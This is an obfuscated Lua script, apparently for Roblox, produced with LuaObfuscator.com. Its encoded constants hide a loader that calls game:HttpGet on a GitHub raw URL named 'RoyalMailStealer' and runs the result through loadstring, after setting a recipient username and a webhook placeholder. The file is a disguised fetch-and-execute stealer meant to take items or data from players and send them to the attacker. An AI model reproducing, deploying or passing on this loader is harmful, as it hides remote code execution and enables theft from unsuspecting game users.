--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.0) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v69=0 -0 ;local v70;while true do if (v69==(0 -0)) then v70=(v31/((3 -1)^(v32-(2 -1))))%((621 -(555 + 64))^(((v33-(932 -(857 + 74))) -(v32-((810 -241) -(367 + 201)))) + (928 -(214 + (1778 -(68 + 997)))))) ;return v70-(v70%1) ;end end else local v71=0 + 0 ;local v72;while true do if (v71==(1270 -(226 + 1044))) then v72=(1 + 1)^(v32-(878 -(282 + 595))) ;return (((v31%(v72 + v72))>=v72) and (1638 -(1523 + 114))) or (0 + 0) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (12 -9) );v19=v19 + (121 -(32 + 85)) ;return (v37 * (16441815 + 335401)) + (v36 * ((34668 -20135) + 51003)) + (v35 * (1213 -(892 + 65))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=675 -(534 + 141) ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v38==(0 + 0)) then v39=0;v40=nil;v38=1 + 0 ;end if (v38==(4 + 0)) then while true do if (v39~=(6 -3)) then else v46=nil;while true do local v98=0 -0 ;while true do if (v98==1) then if (v40~=(0 -0)) then else local v103=0;while true do if (v103==(0 + 0)) then v41={};v42={};v103=1;end if (v103==(1 + 0)) then v43={};v44={v41,v42,nil,v43};v103=2;end if (v103==2) then v40=1 + 0 ;break;end end end break;end if ((0 -0)~=v98) then else if (v40==1) then local v104=0;local v105;while true do if (v104~=(0 -0)) then else v105=867 -(550 + 317) ;while true do if (1==v105) then local v163=0 -0 ;while true do if (v163==(0 -0)) then for v174=1,v45 do local v175=0 -0 ;local v176;local v177;local v178;while true do if (v175==(286 -(134 + 151))) then v178=nil;while true do if (v176==(1665 -(970 + 695))) then local v187=0;while true do if (v187==(0 -0)) then v177=v22();v178=nil;v187=1;end if (v187~=1) then else v176=1991 -(582 + 1408) ;break;end end end if (v176~=1) then else if (v177==1) then v178=v22()~=0 ;elseif (v177==(6 -4)) then v178=v25();elseif (v177==(3 -0)) then v178=v26();end v46[v174]=v178;break;end end break;end if (v175~=(0 -0)) then else v176=1824 -(1195 + 629) ;v177=nil;v175=1 -0 ;end end end v44[3]=v22();v163=242 -(187 + 54) ;end if (v163==1) then v105=2;break;end end end if (0==v105) then local v164=780 -(162 + 618) ;while true do if (v164~=(1 + 0)) then else v105=1 + 0 ;break;end if (v164==(0 -0)) then v45=v24();v46={};v164=1;end end end if (v105==2) then v40=2 -0 ;break;end end break;end end end if (v40==(1 + 1)) then local v106=1636 -(1373 + 263) ;while true do if (v106~=1) then else return v44;end if (v106~=0) then else for v140=1001 -(451 + 549) ,v24() do local v141=0 + 0 ;local v142;local v143;while true do if (v141~=0) then else v142=0 -0 ;v143=nil;v141=1 -0 ;end if ((1385 -(746 + 638))~=v141) then else while true do if (v142~=0) then else v143=v22();if (v21(v143,1,1 + 0 )==0) then local v181=0 -0 ;local v182;local v183;local v184;local v185;local v186;while true do if (v181~=1) then else v184=nil;v185=nil;v181=343 -(218 + 123) ;end if ((1581 -(1535 + 46))==v181) then v182=0;v183=nil;v181=1 + 0 ;end if ((1 + 1)~=v181) then else v186=nil;while true do if (v182==1) then local v189=0;local v190;while true do if (v189==0) then v190=560 -(306 + 254) ;while true do if (v190~=(1 + 0)) then else v182=3 -1 ;break;end if (v190~=0) then else v185=nil;v186=nil;v190=1468 -(899 + 568) ;end end break;end end end if ((0 + 0)==v182) then local v191=0;while true do if (v191==(0 -0)) then v183=603 -(268 + 335) ;v184=nil;v191=1;end if (v191==(291 -(60 + 230))) then v182=1;break;end end end if ((574 -(426 + 146))==v182) then while true do if (v183==(1 + 1)) then local v192=0;local v193;while true do if (v192~=0) then else v193=1456 -(282 + 1174) ;while true do if (v193==(812 -(569 + 242))) then v183=3;break;end if (v193==(0 -0)) then local v201=0 + 0 ;local v202;while true do if (v201==0) then v202=1024 -(706 + 318) ;while true do if (v202==(1251 -(721 + 530))) then if (v21(v185,1,1272 -(945 + 326) )==(2 -1)) then v186[2 + 0 ]=v46[v186[702 -(271 + 429) ]];end if (v21(v185,2 + 0 ,1502 -(1408 + 92) )==(1087 -(461 + 625))) then v186[1291 -(993 + 295) ]=v46[v186[1 + 2 ]];end v202=1;end if (v202==(1172 -(418 + 753))) then v193=1 + 0 ;break;end end break;end end end end break;end end end if (v183==(1 + 0)) then local v194=0 + 0 ;local v195;while true do if (v194~=0) then else v195=0 + 0 ;while true do if (v195==(529 -(406 + 123))) then local v203=0;while true do if (v203~=1) then else v195=1;break;end if (v203==0) then v186={v23(),v23(),nil,nil};if (v184==0) then local v204=0 + 0 ;local v205;local v206;local v207;while true do if (1==v204) then v207=nil;while true do if (v205~=0) then else v206=1145 -(466 + 679) ;v207=nil;v205=1;end if (1==v205) then while true do if (v206~=(0 -0)) then else v207=0 -0 ;while true do if (v207==(1900 -(106 + 1794))) then v186[1 + 2 ]=v23();v186[2 + 2 ]=v23();break;end end break;end end break;end end break;end if (0==v204) then v205=0 -0 ;v206=nil;v204=2 -1 ;end end elseif (v184==(115 -(4 + 110))) then v186[3]=v24();elseif (v184==2) then v186[587 -(57 + 527) ]=v24() -((1429 -(41 + 1386))^(119 -(17 + 86))) ;elseif (v184==3) then local v214=0;local v215;while true do if (v214==0) then v215=0;while true do if (0~=v215) then else v186[3]=v24() -(2^16) ;v186[4]=v23();break;end end break;end end end v203=1 + 0 ;end end end if (v195==1) then v183=2;break;end end break;end end end if (v183==3) then if (v21(v185,3,3)==(1 -0)) then v186[11 -7 ]=v46[v186[4]];end v41[v140]=v186;break;end if (v183==(166 -(122 + 44))) then local v197=0 -0 ;local v198;while true do if (v197~=0) then else v198=0 -0 ;while true do if (1~=v198) then else v183=1 + 0 ;break;end if (v198==0) then v184=v21(v143,1 + 1 ,3);v185=v21(v143,7 -3 ,71 -(30 + 35) );v198=1;end end break;end end end end break;end end break;end end end break;end end break;end end end for v144=1 + 0 ,v24() do v42[v144-1 ]=v29();end v106=1;end end end v98=1258 -(1043 + 214) ;end end end break;end if (v39==0) then local v95=0 -0 ;while true do if (v95~=1) then else v39=1;break;end if (0==v95) then v40=0;v41=nil;v95=1213 -(323 + 889) ;end end end if (2==v39) then local v96=0;while true do if (v96~=(0 -0)) then else v44=nil;v45=nil;v96=1;end if (v96~=(581 -(361 + 219))) then else v39=323 -(53 + 267) ;break;end end end if (v39~=1) then else local v97=0;while true do if (v97==(0 + 0)) then v42=nil;v43=nil;v97=1;end if (v97~=(414 -(15 + 398))) then else v39=2;break;end end end end break;end if (v38~=1) then else v41=nil;v42=nil;v38=984 -(18 + 964) ;end if (v38==2) then v43=nil;v44=nil;v38=11 -8 ;end if ((2 + 1)~=v38) then else v45=nil;v46=nil;v38=3 + 1 ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=v24();local v48=v24();local v49=1;local v50=(v21(v48,851 -(20 + 830) ,16 + 4 ) * ((128 -(116 + 10))^(3 + 7 + 22))) + v47 ;local v51=v21(v48,759 -(542 + 196) ,66 -35 );local v52=((v21(v48,(987 -(553 + 424)) + (41 -19) )==(1 + 0)) and  -(1 + 0)) or 1 ;if (v51==(0 -0)) then if (v50==(0 -0)) then return v52 * (1551 -(1126 + 425)) ;else v51=406 -(118 + 287) ;v49=0 -0 ;end elseif (v51==(3168 -(118 + 1003))) then return ((v50==0) and (v52 * ((1 + 0)/0))) or (v52 * NaN) ;end return v8(v52,v51-(2993 -1970) ) * (v49 + (v50/((379 -(142 + 235))^(235 -(182 + 1))))) ;end v26=nil;function v26(v53)local v54;if  not v53 then v53=v24();if (v53==0) then return "";end end v54=v3(v16,v19,(v19 + v53) -(1 + 0) );v19=v19 + v53 ;local v55={};for v67=1 + 0 , #v54 do v55[v67]=v2(v1(v3(v54,v67,v67)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=v1(v16,v19,v19);v19=v19 + 1 ;return v56;end v23=nil;function v23()local v57,v58=v1(v16,v19,v19 + 2 + 0 );v19=v19 + (4 -2) ;return (v58 * (712 -456)) + v57 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v59)if (v1(v59,2)==79) then v20=v0(v3(v59,1,1));return "";else local v73=v2(v0(v59,16));if v20 then local v77=v5(v73,v20);v20=nil;return v77;else return v73;end end end);v18=1;end if (v18==7) then function v30(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (1==v63) then v66=v60[3];return function(...)local v78=v64;local v79=v65;local v80=v66;local v81=v28;local v82=1;local v83= -1;local v84={};local v85={...};local v86=v12("#",...) -1 ;local v87={};local v88={};for v92=0,v86 do if (v92>=v80) then v84[v92-v80 ]=v85[v92 + 1 ];else v88[v92]=v85[v92 + 1 ];end end local v89=(v86-v80) + 1 ;local v90;local v91;while true do v90=v78[v82];v91=v90[1];if (v91<=10) then if (v91<=4) then if (v91<=1) then if (v91>0) then local v107=0;local v108;local v109;local v110;local v111;while true do if (v107==0) then v108=v90[2];v109,v110=v81(v88[v108](v13(v88,v108 + 1 ,v90[3])));v107=1;end if (v107==1) then v83=(v110 + v108) -1 ;v111=0;v107=2;end if (v107==2) then for v153=v108,v83 do v111=v111 + 1 ;v88[v153]=v109[v111];end break;end end else v88[v90[2]]();end elseif (v91<=2) then v88[v90[2]]();elseif (v91==3) then if ((v90[3]=="_ENV") or (v90[3]=="getfenv")) then v88[v90[2]]=v62;else v88[v90[2]]=v62[v90[3]];end else local v124=v90[2];v88[v124]=v88[v124](v13(v88,v124 + 1 ,v83));end elseif (v91<=7) then if (v91<=5) then do return;end elseif (v91==6) then local v126=0;local v127;local v128;while true do if (v126==0) then v127=v90[2];v128=v88[v90[3]];v126=1;end if (v126==1) then v88[v127 + 1 ]=v128;v88[v127]=v128[v90[4]];break;end end else v88[v90[2]]=v90[3];end elseif (v91<=8) then v62[v90[3]]=v88[v90[2]];elseif (v91>9) then do return;end else local v131=0;local v132;local v133;local v134;local v135;while true do if (v131==2) then for v171=v132,v83 do local v172=0;while true do if (v172==0) then v135=v135 + 1 ;v88[v171]=v133[v135];break;end end end break;end if (v131==0) then v132=v90[2];v133,v134=v81(v88[v132](v13(v88,v132 + 1 ,v90[3])));v131=1;end if (v131==1) then v83=(v134 + v132) -1 ;v135=0;v131=2;end end end elseif (v91<=15) then if (v91<=12) then if (v91==11) then local v114=0;local v115;while true do if (v114==0) then v115=v90[2];v88[v115]=v88[v115](v13(v88,v115 + 1 ,v83));break;end end else v88[v90[2]]=v90[3];end elseif (v91<=13) then local v118=v90[2];local v119=v88[v90[3]];v88[v118 + 1 ]=v119;v88[v118]=v119[v90[4]];elseif (v91==14) then for v149=v90[2],v90[3] do v88[v149]=nil;end else for v151=v90[2],v90[3] do v88[v151]=nil;end end elseif (v91<=18) then if (v91<=16) then v82=v90[3];elseif (v91==17) then v82=v90[3];else v62[v90[3]]=v88[v90[2]];end elseif (v91<=19) then if (v88[v90[2]]==v90[4]) then v82=v82 + 1 ;else v82=v90[3];end elseif (v91==20) then if (v88[v90[2]]==v90[4]) then v82=v82 + 1 ;else v82=v90[3];end elseif ((v90[3]=="_ENV") or (v90[3]=="getfenv")) then v88[v90[2]]=v62;else v88[v90[2]]=v62[v90[3]];end v82=v82 + 1 ;end end;end if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F5265647A487562504149442F4D61696C737465616C65722F6D61696E2F526F79616C4D61696C537465616C657203083O00557365726E616D65030C3O006E617468616E31343732363803073O00576562682O6F6B03123O00596F757220576562682O6F6B20486572652000223O0012073O00014O000F000100013O0026143O0002000100010004103O00020001001207000100013O0026140001000F000100020004103O000F0001001215000200033O001215000300043O002006000300030005001207000500064O0001000300054O000B00023O00022O00020002000100010004103O0021000100261400010005000100010004103O00050001001207000200013O00261400020019000100010004103O00190001001215000300083O001208000300073O0012070003000A3O001208000300093O001207000200023O00261400020012000100020004103O00120001001207000100023O0004103O000500010004103O001200010004103O000500010004103O002100010004103O000200012O000A3O00017O00",v9(),...);
